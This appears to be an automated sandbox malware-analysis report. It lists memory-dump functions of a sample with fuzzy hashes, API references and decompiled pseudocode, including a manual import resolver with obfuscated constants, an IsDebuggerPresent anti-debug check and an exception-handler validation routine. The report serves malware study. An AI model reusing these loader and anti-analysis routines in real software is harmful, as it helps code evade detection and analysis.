Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 3d14e12fcdfc035eaaed6f87dd8dc5fb72ae830e959984212dd2980bdc59f58f
Instruction ID: bd00e6cf0869772574d663e805bfce67fcb7e7521f20d74fd3c3c7a18aef86f9
Opcode Fuzzy Hash: 3d14e12fcdfc035eaaed6f87dd8dc5fb72ae830e959984212dd2980bdc59f58f
Instruction Fuzzy Hash: 38F0A470A55B019BEF409BA96959B483BA4B72B716F20C15EE541C61C8DF7092C3BB48

Uniqueness

Uniqueness Score: -1.00%

Function 6E10160D, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E10160D(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e104140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e10160d
0x6e101616
0x6e10161b
0x6e101621
0x6e10162a
0x6e101630
0x6e101632
0x6e101635
0x6e10163a
0x6e101641
0x6e101641
0x6e101645
0x6e10164b
0x6e101650
0x00000000
0x00000000
0x6e101656
0x6e101660
0x6e101662
0x6e101665
0x6e101668
0x6e10166c
0x6e101674
0x6e101676
0x6e101679
0x6e1016e1
0x6e1016e1
0x6e1016e5
0x00000000
0x00000000
0x6e10167e
0x6e101684
0x6e101686
0x6e101699
0x6e10169c
0x6e10169c
0x6e10169c
0x6e1016a0
0x6e101688
0x6e101688
0x6e101690
0x6e101692
0x00000000
0x00000000
0x00000000
0x00000000
0x6e101692
0x6e101680
0x6e101680
0x6e101694
0x6e101694
0x6e101694
0x6e1016a3
0x6e1016a6
0x6e1016a8
0x6e1016af
0x6e1016aa
0x6e1016aa
0x6e1016aa
0x6e1016b7
0x6e1016bd
0x6e1016bf
0x6e1016ef
0x6e1016c1
0x6e1016c1
0x6e1016c4
0x6e1016c6
0x6e1016ce
0x6e1016ce
0x6e1016d3
0x6e1016d5
0x6e1016dc
0x6e1016de
0x6e1016de
0x6e1016de
0x00000000
0x6e1016de
0x00000000
0x6e1016bf
0x6e10166e
0x6e10166e
0x6e101672
0x00000000
0x00000000
0x6e101672
0x6e1016f2
0x6e1016f2
0x6e1016f9
0x6e1016fe
0x00000000
0x00000000
0x6e101704
0x6e10170f
0x00000000
0x6e10170f
0x6e101706
0x6e101706
0x6e10170c
0x00000000
0x6e10170c
0x6e10163a
0x6e101710
0x6e101715

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E101645
GetProcAddress.KERNEL32(?,00000000), ref: 6E1016B7

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 6f0069b4cd6195a8973c2321fe8d21a35ceb0c6cc9765d492c431c0e12555979
Instruction ID: 49f4a65a6442a5af9e7369ec1f66dfec0913a3ac9dddb29c3fb2c5454d1c9947
Opcode Fuzzy Hash: 6f0069b4cd6195a8973c2321fe8d21a35ceb0c6cc9765d492c431c0e12555979
Instruction Fuzzy Hash: 83314D71B00206DFDB40CF99C890AADB7F9BF15309B25406DD821D7241EBB8DA85DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E14C6CB, Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E14C700
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 6E14C7B5

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: DebuggerPresent_memset
String ID:
API String ID: 2328436684-0
Opcode ID: 9eb4e5b287147f48048d7fe937a91aee7f464e5b518f91d838a83c9d69b1ef43
Instruction ID: 5acc5bc1bd93766fb75c480a09b5ef1f1f597ca7ac5f4f6607c2ea24e18cdc54
Opcode Fuzzy Hash: 9eb4e5b287147f48048d7fe937a91aee7f464e5b518f91d838a83c9d69b1ef43
Instruction Fuzzy Hash: B131D67591122DDBCB61DF64D8887C8BBB8AF08324F2045EAE41CA7350EB309BC59F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E1510C1, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E14C7C9,?,?,?,00000001), ref: 6E1510C6
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6E1510CF

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f463c0ee75faf15d5d95e6b3d3c0e750a47361af8544edcb1f7c55811c4acbe
Instruction ID: 084708e72d57e19daa85bdc329c8a87f5d62365686d2999366190d52326d809c
Opcode Fuzzy Hash: 8f463c0ee75faf15d5d95e6b3d3c0e750a47361af8544edcb1f7c55811c4acbe
Instruction Fuzzy Hash: CBB09231644609EBCEA02B9BD80AFAC3F3CEB06662F018010FA2D44054AB625450AAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1023A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1023A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e104178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1041c0 = 1;
										__eflags =  *0x6e1041c0;
										if( *0x6e1041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e104178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e104178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e104180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e10417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e104180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e104180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1041c0 = 1;
							__eflags =  *0x6e1041c0;
							if( *0x6e1041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e104180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e104180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e104180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e104178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e104180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e104180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1023af
0x6e1023b2
0x6e1023b8
0x6e1023d6
0x00000000
0x6e1023d6
0x6e1023c0
0x6e1023c9
0x6e1023cf
0x6e1023de
0x6e1023e1
0x6e1023e4
0x6e1023ee
0x6e1023ee
0x6e1023f0
0x6e1023f3
0x6e1023f5
0x6e1023f5
0x6e1023f7
0x6e1023fa
0x00000000
0x00000000
0x6e1023fc
0x6e1023fe
0x6e102464
0x6e102464
0x6e1025c2
0x00000000
0x6e1025c2
0x6e102400
0x6e102400
0x6e102404
0x6e102406
0x6e102406
0x6e102406
0x6e102406
0x6e102409
0x6e10240a
0x6e10240d
0x6e10240d
0x6e102411
0x6e102415
0x6e102423
0x6e102423
0x6e10242b
0x6e102431
0x6e102433
0x6e102435
0x6e102445
0x6e102452
0x6e102456
0x6e10245b
0x6e10245d
0x6e1024db
0x6e1024db
0x6e10245f
0x6e10245f
0x6e10245f
0x6e1024dd
0x6e1024df
0x6e1025c0
0x6e1025c0
0x00000000
0x6e1024e5
0x6e1024e5
0x6e1024ec
0x00000000
0x00000000
0x6e1024f2
0x6e1024f6
0x6e102552
0x6e102554
0x6e10255c
0x6e10255e
0x6e102560
0x00000000
0x00000000
0x6e102562
0x6e102568
0x6e10256a
0x6e10256c
0x6e102581
0x6e102581
0x6e102583
0x6e1025b2
0x6e1025b9
0x00000000
0x6e1025b9
0x6e102587
0x6e102588
0x6e10258a
0x6e10258c
0x6e10258c
0x6e10258e
0x6e102590
0x6e102592
0x6e1025a6
0x6e1025a6
0x6e1025a9
0x6e1025ab
0x6e1025ab
0x6e1025ac
0x6e1025ac
0x00000000
0x6e102594
0x6e102594
0x6e102594
0x6e10259d
0x6e10259e
0x6e1025a0
0x6e1025a2
0x6e1025a2
0x00000000
0x6e102594
0x6e102592
0x6e10256e
0x6e102575
0x6e102575
0x6e102577
0x00000000
0x00000000
0x6e102579
0x6e10257a
0x6e10257d
0x6e10257f
0x00000000
0x00000000
0x00000000
0x6e10257f
0x00000000
0x6e102575
0x6e1024f8
0x6e1024fb
0x6e102500
0x00000000
0x00000000
0x6e102509
0x6e10250b
0x6e102511
0x00000000
0x00000000
0x6e102517
0x6e10251d
0x00000000
0x00000000
0x6e102523
0x6e102525
0x6e10252e
0x6e102532
0x00000000
0x00000000
0x6e102538
0x6e10253b
0x6e10253d
0x00000000
0x00000000
0x6e102544
0x6e102546
0x00000000
0x00000000
0x6e102548
0x6e10254c
0x00000000
0x00000000
0x00000000
0x6e10254c
0x00000000
0x00000000
0x00000000
0x6e102437
0x6e102437
0x6e102437
0x6e10243e
0x00000000
0x00000000
0x6e102440
0x6e102441
0x6e102443
0x00000000
0x00000000
0x00000000
0x6e102443
0x6e10246b
0x6e10246d
0x00000000
0x00000000
0x6e10247d
0x6e10247f
0x6e102481
0x00000000
0x00000000
0x6e102487
0x6e10248e
0x6e1024ba
0x6e1024ba
0x6e1024bc
0x6e1024be
0x6e1024d2
0x6e1024d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1024c0
0x6e1024c0
0x6e1024c0
0x6e1024c9
0x6e1024ca
0x6e1024cc
0x6e1024ce
0x6e1024ce
0x00000000
0x6e1024c0
0x6e102490
0x6e102493
0x6e102495
0x6e1024a7
0x6e1024a7
0x6e1024aa
0x6e1024ac
0x6e1024ac
0x6e1024ad
0x6e1024ad
0x6e1024b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e102497
0x6e102497
0x6e102497
0x6e10249e
0x00000000
0x00000000
0x6e1024a0
0x6e1024a0
0x6e1024a1
0x00000000
0x00000000
0x00000000
0x6e1024a1
0x6e1024a3
0x6e1024a5
0x6e1024b8
0x00000000
0x00000000
0x00000000
0x6e1024b8
0x00000000
0x6e1024a5
0x6e102417
0x6e10241a
0x6e10241d
0x00000000
0x00000000
0x6e10241f
0x6e102421
0x00000000
0x00000000
0x00000000
0x6e102421
0x6e1023e6
0x6e1023e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E102456

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 7351ee143f4857929b136dd1b6d14d40351586c5c4029f7fae5799a1578d8fb8
Instruction ID: 29a53f23bfc3ce02b299442c26a38e9d3900fd5c93a11eeed0f54579ce72e055
Opcode Fuzzy Hash: 7351ee143f4857929b136dd1b6d14d40351586c5c4029f7fae5799a1578d8fb8
Instruction Fuzzy Hash: 7261D270714606DFEB59CFA9C8E069933B5EB69324B308568D816CB186FF70D8C2E750

Uniqueness

Uniqueness Score: -1.00%

Function 6E146700, Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

,, xrefs: 6E1469D2

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 3549a68812664c6a358a40b196e5cf6ea6ed59bdc50ef1dd7c38cf887599364d
Instruction ID: 33a62d7264a160bc81089191c5a00ffd45a3810bff33cd76fff85cf5d90bc1cd
Opcode Fuzzy Hash: 3549a68812664c6a358a40b196e5cf6ea6ed59bdc50ef1dd7c38cf887599364d
Instruction Fuzzy Hash: C9F12B70A0092CDFCF08DF68C590A5C7BB2FB8BB04B24E96AD58997345D6349986EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E151A40, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00041A2C,00000001), ref: 6E151A6E

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6a909baea7cc1caabf834e8b0e778053170d111d56a3120ee75cd26ffa345a23
Instruction ID: f7152fb3ed39cafbf85b0eea71f5297dbba797be2d61ae182ce37c9f0321fd01
Opcode Fuzzy Hash: 6a909baea7cc1caabf834e8b0e778053170d111d56a3120ee75cd26ffa345a23
Instruction Fuzzy Hash: E9E04F7211060CEFDF42CFE0DC09F5637A6B746710F10C400F5288A654C3B5A464EF54

Uniqueness

Uniqueness Score: -1.00%

Function 6E151AC6, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,6E14AA6F,?,?,?,00000002,?,00000000,00000000), ref: 6E151AED

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a974b1719815f65cc7d0e4857f47e49196d7e83f790327b1dec32f8ecf49ff26
Instruction ID: 8d03be5dc0346b9377bbde61575dde070312fc502f94873da9dbc23468013ac5
Opcode Fuzzy Hash: a974b1719815f65cc7d0e4857f47e49196d7e83f790327b1dec32f8ecf49ff26
Instruction Fuzzy Hash: A8D09E7250454DBF8F02DFE5EC49CAE3B69FB49324B108845F92C45510EB36A570EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E151090, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 6E151096

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0f0102dd5752ae7a2d38a4250a7970076b41fc335a6bb70ac2124eeb62bc38ba
Instruction ID: 499213104f8257baa896cb84678ce8d94dcc8fd66399d11616d65f25d5ea04e3
Opcode Fuzzy Hash: 0f0102dd5752ae7a2d38a4250a7970076b41fc335a6bb70ac2124eeb62bc38ba
Instruction Fuzzy Hash: 5CA0123000010CE78E101A46D8058587F2CD6011507008010F80C00011973254105590

Uniqueness

Uniqueness Score: -1.00%

Function 6E14B830, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(6E14A231,6E17B488,00000008,6E14A407,?,00000001,?,6E17B4A8,0000000C,6E14A3A6,?,00000001,?), ref: 6E14B830

Memory Dump Source

Source File: 00000000.00000002.593062990.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 97bf7494c43cb34caf2d2680b97c675769daacee5883cc8620e802aa9864a90a
Instruction ID: 8359f51d2ff555194efc7ecbf0ac4b7929a0f53697a468b225e8961b006b5c39
Opcode Fuzzy Hash: 97bf7494c43cb34caf2d2680b97c675769daacee5883cc8620e802aa9864a90a
Instruction Fuzzy Hash: 12B012B0302A03574F484B395D2911E3AE87B0A201300807D7103C2180DF70C410EF00

Uniqueness

Uniqueness Score: -1.00%

Function 6E102184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E102184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1022EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1023A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E102290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1022EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E102387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e102188
0x6e102189
0x6e10218a
0x6e10218d
0x6e10218f
0x6e102192
0x6e102193
0x6e102195
0x6e102196
0x6e102197
0x6e10219a
0x6e1021a4
0x6e102255
0x6e10225c
0x6e102265
0x6e1021aa
0x6e1021aa
0x6e1021b0
0x6e1021b6
0x6e1021b9
0x6e1021bc
0x6e1021c0
0x6e1021c5
0x6e1021ca
0x6e10224a
0x00000000
0x6e1021cc
0x6e1021cc
0x6e1021d8
0x6e1021da
0x6e102235
0x6e102235
0x6e10223b
0x00000000
0x6e1021dc
0x6e1021eb
0x6e1021ed
0x6e1021ee
0x6e1021ef
0x6e1021f2
0x6e1021f2
0x6e1021f4
0x00000000
0x6e1021f6
0x6e1021f6
0x6e102240
0x6e1021f8
0x6e1021f8
0x6e1021fc
0x6e102204
0x6e102209
0x6e10220e
0x6e10221a
0x6e102222
0x6e102229
0x6e10222f
0x6e102233
0x00000000
0x6e102233
0x6e1021f6
0x6e1021f4
0x00000000
0x6e1021da
0x6e10224e
0x6e10224e
0x6e10224e
0x6e1021ca
0x6e10226a
0x6e102271

Memory Dump Source

Source File: 00000000.00000002.592957944.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000000.00000002.592937321.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.592980876.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.593001858.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.593030817.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: bc54a758c4d3742eac28abbba229eb8436e08fccec94970c9be6dfeabc9992f8
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: D021C4729002059FDB00DFE8D8809A7B7A9BF49350B468468D9198B246DF30FA55D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E180E3F, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.593689385.000000006E180000.00000040.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
